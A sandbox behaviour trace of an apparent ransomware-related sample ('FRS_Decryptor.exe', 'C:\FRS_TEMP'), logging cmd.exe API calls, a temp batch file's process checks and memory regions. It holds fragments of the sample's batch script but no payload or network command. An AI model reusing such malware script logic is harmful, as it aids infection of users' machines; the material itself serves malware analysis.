[0146.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0146.609] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0146.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0146.609] GetLastError () returned 0x2 [0146.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ab0 [0146.609] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0146.609] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0146.610] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0146.610] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0146.610] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.610] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.611] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.611] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.611] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.611] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0146.611] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x154, dwProcessId=0xa98, dwThreadId=0x798)) returned 1 [0146.614] CloseHandle (hObject=0x154) returned 1 [0146.614] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.614] GetEnvironmentStringsW () returned 0xd30508* [0146.614] FreeEnvironmentStringsA (penv="=") returned 1 [0146.614] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0148.727] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0148.727] CloseHandle (hObject=0x2b0) returned 1 [0148.727] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0148.727] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.728] GetEnvironmentStringsW () returned 0xd7e510* [0148.728] FreeEnvironmentStringsA (penv="=") returned 1 [0148.728] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.728] GetEnvironmentStringsW () returned 0xd30508* [0148.728] FreeEnvironmentStringsA (penv="=") returned 1 [0148.728] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0148.728] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0148.728] _close (_FileHandle=3) returned 0 [0148.728] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.728] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0148.729] _get_osfhandle (_FileHandle=1) returned 0x28 [0148.729] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0148.729] _get_osfhandle (_FileHandle=0) returned 0x24 [0148.729] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0148.729] SetConsoleInputExeNameW () returned 0x1 [0148.729] GetConsoleOutputCP () returned 0x1b5 [0148.729] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0148.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.729] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0148.730] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0148.730] _get_osfhandle (_FileHandle=3) returned 0x2ec [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0148.730] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0148.730] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0148.730] GetFileType (hFile=0x2ec) returned 0x1 [0148.730] _get_osfhandle (_FileHandle=3) returned 0x2ec [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0148.730] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0148.730] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0148.730] GetFileType (hFile=0x2ec) returned 0x1 [0148.730] _get_osfhandle (_FileHandle=3) returned 0x2ec [0148.730] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0148.730] _tell (_FileHandle=3) returned 2627 [0148.730] _close (_FileHandle=3) returned 0 [0148.731] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0148.731] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0148.731] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0148.731] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0148.731] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0148.736] feof (_File=0x76ea4c68) returned 0 [0148.736] ferror (_File=0x76ea4c68) returned 0 [0148.736] fgets (_Buf=0xd823d0, _MaxCount=256, _File=0x76ea4c68) Thread: id = 36 os_tid = 0xbec Thread: id = 37 os_tid = 0x2ac Thread: id = 38 os_tid = 0x808 Thread: id = 39 os_tid = 0xbf0 Thread: id = 61 os_tid = 0x4f0 Thread: id = 67 os_tid = 0xaa8 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1181b000" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff" cur_dir = "C:\\Windows" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 231 start_va = 0x7f727000 end_va = 0x7f727fff entry_point = 0x0 region_type = private name = "private_0x000000007f727000" filename = "" Region: id = 232 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 233 start_va = 0xd4dfbd0000 end_va = 0xd4dfbeffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfbd0000" filename = "" Region: id = 234 start_va = 0xd4dfbf0000 end_va = 0xd4dfbfefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfbf0000" filename = "" Region: id = 235 start_va = 0xd4dfc00000 end_va = 0xd4dfc3ffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfc00000" filename = "" Region: id = 236 start_va = 0x7ff6c74f0000 end_va = 0x7ff6c7512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c74f0000" filename = "" Region: id = 237 start_va = 0x7ff6c751d000 end_va = 0x7ff6c751efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c751d000" filename = "" Region: id = 238 start_va = 0x7ff6c751f000 end_va = 0x7ff6c751ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c751f000" filename = "" Region: id = 239 start_va = 0x7ff6c78b0000 end_va = 0x7ff6c790bfff entry_point = 0x7ff6c78b0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 240 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 241 start_va = 0xd4dfe20000 end_va = 0xd4dff1ffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfe20000" filename = "" Region: id = 242 start_va = 0x7ffb1ada0000 end_va = 0x7ffb1aeaffff entry_point = 0x7ffb1ada0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 243 start_va = 0x7ffb1b140000 end_va = 0x7ffb1b279fff entry_point = 0x7ffb1b140000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 244 start_va = 0xd4dfbd0000 end_va = 0xd4dfbdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfbd0000" filename = "" Region: id = 245 start_va = 0xd4dfbe0000 end_va = 0xd4dfbe6fff entry_point = 0x0 region_type = private name = "private_0x000000d4dfbe0000" filename = "" Region: id = 246 start_va = 0xd4dfc40000 end_va = 0xd4dfcbdfff entry_point = 0xd4dfc40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 247 start_va = 0x7ff6c73f0000 end_va = 0x7ff6c74effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c73f0000" filename = "" Region: id = 248 start_va = 0x7ffb1af60000 end_va = 0x7ffb1b006fff entry_point = 0x7ffb1af60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 249 start_va = 0x7ffb1b070000 end_va = 0x7ffb1b126fff entry_point = 0x7ffb1b070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 250 start_va = 0x7ffb1b410000 end_va = 0x7ffb1b580fff entry_point = 0x7ffb1b410000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 251 start_va = 0x7ffb1b590000 end_va = 0x7ffb1b6c8fff entry_point = 0x7ffb1b590000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 252 start_va = 0x7ffb1b870000 end_va = 0x7ffb1ba45fff entry_point = 0x7ffb1b870000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 253 start_va = 0x7ffb1d2f0000 end_va = 0x7ffb1d323fff entry_point = 0x7ffb1d2f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 254 start_va = 0x7ffb1d450000 end_va = 0x7ffb1d594fff entry_point = 0x7ffb1d450000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 255 start_va = 0x7ffb1d5a0000 end_va = 0x7ffb1d6d5fff entry_point = 0x7ffb1d5a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 256 start_va = 0xd4dfcc0000 end_va = 0xd4dfcc6fff entry_point = 0x0 region_type = private name = "private_0x000000d4dfcc0000" filename = "" Region: id = 257 start_va = 0xd4dfcd0000 end_va = 0xd4dfcd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfcd0000" filename = "" Region: id = 258 start_va = 0xd4dfce0000 end_va = 0xd4dfce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfce0000" filename = "" Region: id = 259 start_va = 0xd4dfcf0000 end_va = 0xd4dfcf0fff entry_point = 0x0 region_type = private name = "private_0x000000d4dfcf0000" filename = "" Region: id = 260 start_va = 0xd4dfd00000 end_va = 0xd4dfd0ffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfd00000" filename = "" Region: id = 261 start_va = 0xd4dfd10000 end_va = 0xd4dfd10fff entry_point = 0x0 region_type = private name = "private_0x000000d4dfd10000" filename = "" Region: id = 262 start_va = 0xd4dfd20000 end_va = 0xd4dfd5ffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfd20000" filename = "" Region: id = 263 start_va = 0xd4dff20000 end_va = 0xd4e00a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dff20000" filename = "" Region: id = 264 start_va = 0xd4e00b0000 end_va = 0xd4e0230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e00b0000" filename = "" Region: id = 265 start_va = 0xd4e0240000 end_va = 0xd4e163ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e0240000" filename = "" Region: id = 266 start_va = 0xd4e1640000 end_va = 0xd4e1a3bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e1640000" filename = "" Region: id = 267 start_va = 0x7ff6c751b000 end_va = 0x7ff6c751cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c751b000" filename = "" Region: id = 268 start_va = 0x7ffb197a0000 end_va = 0x7ffb198c0fff entry_point = 0x7ffb197a0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 269 start_va = 0xd4dfc00000 end_va = 0xd4dfc03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfc00000" filename = "" Region: id = 270 start_va = 0xd4dfc10000 end_va = 0xd4dfc16fff entry_point = 0x0 region_type = private name = "private_0x000000d4dfc10000" filename = "" Region: id = 271 start_va = 0xd4dfc20000 end_va = 0xd4dfc23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfc20000" filename = "" Region: id = 272 start_va = 0xd4dfd60000 end_va = 0xd4dfd9ffff entry_point = 0x0 region_type = private name = "private_0x000000d4dfd60000" filename = "" Region: id = 273 start_va = 0xd4e1a40000 end_va = 0xd4e1b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e1a40000" filename = "" Region: id = 274 start_va = 0xd4e1b50000 end_va = 0xd4e1b5ffff entry_point = 0x0 region_type = private name = "private_0x000000d4e1b50000" filename = "" Region: id = 275 start_va = 0xd4e1b60000 end_va = 0xd4e1e34fff entry_point = 0xd4e1b60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 276 start_va = 0x7ffb19210000 end_va = 0x7ffb1922ffff entry_point = 0x7ffb19210000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 277 start_va = 0xd4dfc30000 end_va = 0xd4dfc34fff entry_point = 0xd4dfc30000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 278 start_va = 0xd4dfda0000 end_va = 0xd4dfda2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfda0000" filename = "" Region: id = 279 start_va = 0x7ffb18f20000 end_va = 0x7ffb19179fff entry_point = 0x7ffb18f20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_6242a4b3ecbb55a1\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_6242a4b3ecbb55a1\\comctl32.dll") Region: id = 280 start_va = 0xd4dfdc0000 end_va = 0xd4dfdc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4dfdc0000" filename = "" Region: id = 281 start_va = 0x7ffb193e0000 end_va = 0x7ffb1947efff entry_point = 0x7ffb193e0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Thread: id = 3 os_tid = 0xa8c Thread: id = 4 os_tid = 0xa9c Thread: id = 5 os_tid = 0xaac Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11abf000" os_pid = "0xabc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c find \"e\" \"C:\\FRS_TEMP\\temp.txt\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 295 start_va = 0x3c0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 296 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 297 start_va = 0x3f0000 end_va = 0x3fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 298 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 299 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 300 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 301 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 302 start_va = 0x560000 end_va = 0x561fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 303 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 304 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 305 start_va = 0x7ee10000 end_va = 0x7ee32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee10000" filename = "" Region: id = 306 start_va = 0x7ee3a000 end_va = 0x7ee3afff entry_point = 0x0 region_type = private name = "private_0x000000007ee3a000" filename = "" Region: id = 307 start_va = 0x7ee3c000 end_va = 0x7ee3efff entry_point = 0x0 region_type = private name = "private_0x000000007ee3c000" filename = "" Region: id = 308 start_va = 0x7ee3f000 end_va = 0x7ee3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee3f000" filename = "" Region: id = 309 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 310 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 311 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 312 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 313 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 314 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 315 start_va = 